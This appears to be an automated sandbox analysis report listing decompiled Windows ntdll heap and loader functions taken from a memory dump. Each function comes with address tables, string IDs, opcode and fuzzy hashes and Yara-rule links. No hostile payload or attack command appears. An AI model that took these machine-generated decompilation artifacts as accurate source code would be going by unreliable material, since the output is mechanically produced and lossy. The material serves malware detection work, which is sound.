                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00C3932A
                                                                                        • H+v, xrefs: 00BF8E2C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H+v$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 0-876216146
                                                                                        • Opcode ID: 027f55ed280b5e6086d60324d59c69ba8e0aaeec756005d59140a1294e4d1aa8
                                                                                        • Instruction ID: fcf31727fbf2907fe38a0c02e23d9d4d78a326a9c7a229d686e21c004733663f
                                                                                        • Opcode Fuzzy Hash: 027f55ed280b5e6086d60324d59c69ba8e0aaeec756005d59140a1294e4d1aa8
                                                                                        • Instruction Fuzzy Hash: 62410932A0031D9FDB35AB18DC8DB7AB6E4EB11354F0541EAEA18571A1EF709D88C681
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BC40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 29%
                                                                                        			E00BC40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00BCB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00BCB150(", passed to %s", _t29);
					}
					_push("\n");
					E00BCB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xcb6378 = 1;
						asm("int3");
						 *0xcb6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                        0x00bc40e6
                                                                                        0x00bc40e8
                                                                                        0x00bc40f1
                                                                                        0x00c2042d
                                                                                        0x00c2044c
                                                                                        0x00c20451
                                                                                        0x00c2042f
                                                                                        0x00c20444
                                                                                        0x00c20449
                                                                                        0x00c2045d
                                                                                        0x00c20466
                                                                                        0x00c2046e
                                                                                        0x00c20474
                                                                                        0x00c20475
                                                                                        0x00c2047a
                                                                                        0x00c2048a
                                                                                        0x00c2048c
                                                                                        0x00c20493
                                                                                        0x00c20494
                                                                                        0x00c20494
                                                                                        0x00000000
                                                                                        0x00c2049b
                                                                                        0x00000000

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                        • API String ID: 0-188067316
                                                                                        • Opcode ID: 39b53c8cd4a059c3a793cde9621d9891f8f133a1502d9884e44cd06e78c35051
                                                                                        • Instruction ID: 798afb8c2b9e1e4fd01530294851424cd9275115a0a428247a41eb1d0b70d7d5
                                                                                        • Opcode Fuzzy Hash: 39b53c8cd4a059c3a793cde9621d9891f8f133a1502d9884e44cd06e78c35051
                                                                                        • Instruction Fuzzy Hash: AE014C321146509ED315A764F45FF9A77E8DB01B30F3C80EEF10657AE2CBA49844C120
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 70%
                                                                                        			E00BEA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xcb8748 - 1;
					if( *0xcb8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00BCB150();
									_t260 = _t257 + 4;
								} else {
									E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00BCB150();
								_t257 = _t260 + 4;
								__eflags =  *0xcb7bc8;
								if(__eflags == 0) {
									E00C82073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00C8A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E00C1D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E00BEAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00C8A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00C8A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xcb8748 - 1;
					if( *0xcb8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00BCB150();
							} else {
								E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00BCB150();
							__eflags =  *0xcb7bc8;
							if(__eflags == 0) {
								_t131 = E00C82073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                        0x00bea83a
                                                                                        0x00bea83c
                                                                                        0x00bea83e
                                                                                        0x00bea841
                                                                                        0x00bea844
                                                                                        0x00bea84a
                                                                                        0x00beaa53
                                                                                        0x00beaa59
                                                                                        0x00beaa59
                                                                                        0x00bea858
                                                                                        0x00bea85e
                                                                                        0x00beaaf5
                                                                                        0x00beaafc
                                                                                        0x00c3229e
                                                                                        0x00c322a2
                                                                                        0x00c322a8
                                                                                        0x00c322b3
                                                                                        0x00c322b5
                                                                                        0x00c322bb
                                                                                        0x00c322c1
                                                                                        0x00c322c5
                                                                                        0x00c322e6
                                                                                        0x00c322eb
                                                                                        0x00c322f0
                                                                                        0x00c322c7
                                                                                        0x00c322dc
                                                                                        0x00c322e1
                                                                                        0x00c322e1
                                                                                        0x00c322f3
                                                                                        0x00c322f8
                                                                                        0x00c322fd
                                                                                        0x00c32300
                                                                                        0x00c32307
                                                                                        0x00c3230e
                                                                                        0x00c3230e
                                                                                        0x00c32313
                                                                                        0x00c32313
                                                                                        0x00c322b5
                                                                                        0x00c322a2
                                                                                        0x00beaafc
                                                                                        0x00bea864
                                                                                        0x00bea869
                                                                                        0x00beaa5c
                                                                                        0x00beaa5e
                                                                                        0x00bea86f
                                                                                        0x00bea87f
                                                                                        0x00bea885
                                                                                        0x00bea885
                                                                                        0x00bea88b
                                                                                        0x00bea890
                                                                                        0x00bea896
                                                                                        0x00beab0c
                                                                                        0x00beab0f
                                                                                        0x00beab15
                                                                                        0x00c32320
                                                                                        0x00c32320
                                                                                        0x00beab1b
                                                                                        0x00bea89c
                                                                                        0x00bea89f
                                                                                        0x00bea8a2
                                                                                        0x00bea8a2
                                                                                        0x00bea8a5
                                                                                        0x00bea8af
                                                                                        0x00bea8b3
                                                                                        0x00bea8b8
                                                                                        0x00beaa66
                                                                                        0x00bea8be
                                                                                        0x00bea8c5
                                                                                        0x00bea8c6
                                                                                        0x00bea8ce
                                                                                        0x00c32328
                                                                                        0x00c32332
                                                                                        0x00c32337
                                                                                        0x00c32337
                                                                                        0x00bea8ce
                                                                                        0x00bea8d4
                                                                                        0x00bea8d8
                                                                                        0x00bea8db
                                                                                        0x00bea8de
                                                                                        0x00bea8e1
                                                                                        0x00bea8e5
                                                                                        0x00bea8e8
                                                                                        0x00bea8f0
                                                                                        0x00bea8f3
                                                                                        0x00c3234c
                                                                                        0x00c32350
                                                                                        0x00c32355
                                                                                        0x00c32359
                                                                                        0x00c32359
                                                                                        0x00bea8f9
                                                                                        0x00bea901
                                                                                        0x00beaae4
                                                                                        0x00beaae4
                                                                                        0x00beaaea
                                                                                        0x00000000
                                                                                        0x00bea907
                                                                                        0x00bea90a
                                                                                        0x00bea91d
                                                                                        0x00bea91d
                                                                                        0x00000000
                                                                                        0x00bea910
                                                                                        0x00bea910
                                                                                        0x00bea910
                                                                                        0x00bea914
                                                                                        0x00bea924
                                                                                        0x00bea924
                                                                                        0x00bea924
                                                                                        0x00bea924
                                                                                        0x00bea916
                                                                                        0x00bea91b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bea91b
                                                                                        0x00bea925
                                                                                        0x00bea925
                                                                                        0x00bea932
                                                                                        0x00bea936
                                                                                        0x00bea93c
                                                                                        0x00bea93c
                                                                                        0x00bea93c
                                                                                        0x00beab22
                                                                                        0x00beab24
                                                                                        0x00beab27
                                                                                        0x00beab27
                                                                                        0x00bea942
                                                                                        0x00bea944
                                                                                        0x00beaaba
                                                                                        0x00beaabd
                                                                                        0x00beaac0
                                                                                        0x00beaac0
                                                                                        0x00beaac2
                                                                                        0x00beab2f
                                                                                        0x00beaac4
                                                                                        0x00beaac4
                                                                                        0x00beaac7
                                                                                        0x00beaaca
                                                                                        0x00beaacc
                                                                                        0x00beaace
                                                                                        0x00beaace
                                                                                        0x00beaace
                                                                                        0x00beaad1
                                                                                        0x00beaad1
                                                                                        0x00beaad7
                                                                                        0x00beaad9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c32361
                                                                                        0x00c32369
                                                                                        0x00c3236b
                                                                                        0x00000000
                                                                                        0x00c32371
                                                                                        0x00000000
                                                                                        0x00c32371
                                                                                        0x00000000
                                                                                        0x00c3236b
                                                                                        0x00beaac0
                                                                                        0x00bea94a
                                                                                        0x00bea94a
                                                                                        0x00bea94d
                                                                                        0x00bea94d
                                                                                        0x00bea950
                                                                                        0x00bea954
                                                                                        0x00c32376
                                                                                        0x00c32380
                                                                                        0x00bea95a
                                                                                        0x00bea95a
                                                                                        0x00bea95c
                                                                                        0x00bea95f
                                                                                        0x00bea961
                                                                                        0x00bea961
                                                                                        0x00bea967
                                                                                        0x00bea96a
                                                                                        0x00bea972
                                                                                        0x00beaa02
                                                                                        0x00beaa06
                                                                                        0x00beaa10
                                                                                        0x00beaa16
                                                                                        0x00beaa16
                                                                                        0x00beaa1b
                                                                                        0x00beaa21
                                                                                        0x00beaa24
                                                                                        0x00beaa27
                                                                                        0x00beaa29
                                                                                        0x00beaa2c
                                                                                        0x00beaa32
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bea978
                                                                                        0x00bea978
                                                                                        0x00bea97b
                                                                                        0x00bea981
                                                                                        0x00bea996
                                                                                        0x00bea998
                                                                                        0x00bea99f
                                                                                        0x00bea9a2
                                                                                        0x00c3238a
                                                                                        0x00bea9a8
                                                                                        0x00bea9a8
                                                                                        0x00bea9a8
                                                                                        0x00bea9aa
                                                                                        0x00bea9ad
                                                                                        0x00bea9b0
                                                                                        0x00bea9bb
                                                                                        0x00bea9be
                                                                                        0x00bea9c7
                                                                                        0x00bea9c9
                                                                                        0x00bea9c9
                                                                                        0x00bea9cc
                                                                                        0x00bea9d1
                                                                                        0x00beaa6d
                                                                                        0x00beaa70
                                                                                        0x00beaa73
                                                                                        0x00beaa75
                                                                                        0x00beaa79
                                                                                        0x00beaa7e
                                                                                        0x00beaa82
                                                                                        0x00beaa8f
                                                                                        0x00beaa94
                                                                                        0x00beaa96
                                                                                        0x00c32392
                                                                                        0x00c323a1
                                                                                        0x00c323a1
                                                                                        0x00beaa9c
                                                                                        0x00beaa9f
                                                                                        0x00beaaa2
                                                                                        0x00beaaa2
                                                                                        0x00beaaa8
                                                                                        0x00beaaab
                                                                                        0x00beaaaf
                                                                                        0x00000000
                                                                                        0x00beaab5
                                                                                        0x00000000
                                                                                        0x00beaab5
                                                                                        0x00bea9d7
                                                                                        0x00bea9d7
                                                                                        0x00bea9da
                                                                                        0x00bea9e0
                                                                                        0x00bea9e3
                                                                                        0x00bea9e6
                                                                                        0x00bea9e9
                                                                                        0x00bea9eb
                                                                                        0x00bea9fd
                                                                                        0x00bea9fd
                                                                                        0x00000000
                                                                                        0x00bea9eb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bea983
                                                                                        0x00bea983
                                                                                        0x00bea983
                                                                                        0x00bea987
                                                                                        0x00bea995
                                                                                        0x00bea995
                                                                                        0x00bea995
                                                                                        0x00bea995
                                                                                        0x00bea989
                                                                                        0x00bea98e
                                                                                        0x00000000
                                                                                        0x00bea990
                                                                                        0x00000000
                                                                                        0x00bea990
                                                                                        0x00bea98e
                                                                                        0x00000000
                                                                                        0x00bea983
                                                                                        0x00bea972
                                                                                        0x00bea90a
                                                                                        0x00beaa34
                                                                                        0x00beaa34
                                                                                        0x00beaa40
                                                                                        0x00beaa43
                                                                                        0x00beaa46
                                                                                        0x00beaa4d
                                                                                        0x00c323ab
                                                                                        0x00c323b2
                                                                                        0x00c323b8
                                                                                        0x00c323be
                                                                                        0x00c323c3
                                                                                        0x00c323c5
                                                                                        0x00c323cb
                                                                                        0x00c323d1
                                                                                        0x00c323d5
                                                                                        0x00c323f6
                                                                                        0x00c323fb
                                                                                        0x00c323d7
                                                                                        0x00c323ec
                                                                                        0x00c323f1
                                                                                        0x00c32403
                                                                                        0x00c32408
                                                                                        0x00c32410
                                                                                        0x00c32417
                                                                                        0x00c32422
                                                                                        0x00c32422
                                                                                        0x00c32417
                                                                                        0x00c323c5
                                                                                        0x00c323b2
                                                                                        0x00000000

                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 00C322D7, 00C323E7
                                                                                        • HEAP: , xrefs: 00C322E6, 00C323F6
                                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00C322F3
                                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00C32403
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                        • API String ID: 0-1657114761
                                                                                        • Opcode ID: c49d1949b6980458d438a44eb978fba758faffcd53e5ef950b516f86022eb802
                                                                                        • Instruction ID: 6107b37181ffc9d1b1ce1d5f1e404729abce9591b430bb7cd890bdf07a6fe299
                                                                                        • Opcode Fuzzy Hash: c49d1949b6980458d438a44eb978fba758faffcd53e5ef950b516f86022eb802
                                                                                        • Instruction Fuzzy Hash: CDD1B074A002859FDB18CF6AC490BBAB7F9FF48300F1581A9E8569B342E734BD45DB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 69%
                                                                                        			E00BEA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E00BEDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00C09730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00C8A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00C09660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00BCB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E00BE7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00C8138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E00BE7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E00BE7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00C81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E00BE7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E00BE7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00C81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E00C1D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                        0x00bea229
                                                                                        0x00bea231
                                                                                        0x00bea23f
                                                                                        0x00bea242
                                                                                        0x00bea244
                                                                                        0x00bea24c
                                                                                        0x00bea255
                                                                                        0x00bea25a
                                                                                        0x00bea25f
                                                                                        0x00c31c76
                                                                                        0x00c31c78
                                                                                        0x00c31c7e
                                                                                        0x00c31c7f
                                                                                        0x00c31c81
                                                                                        0x00c31c82
                                                                                        0x00c31c84
                                                                                        0x00c31c89
                                                                                        0x00c31c8b
                                                                                        0x00c31c9e
                                                                                        0x00c31c9e
                                                                                        0x00c31cab
                                                                                        0x00c31cb2
                                                                                        0x00000000
                                                                                        0x00c31cb2
                                                                                        0x00c31c8d
                                                                                        0x00c31c92
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c31c94
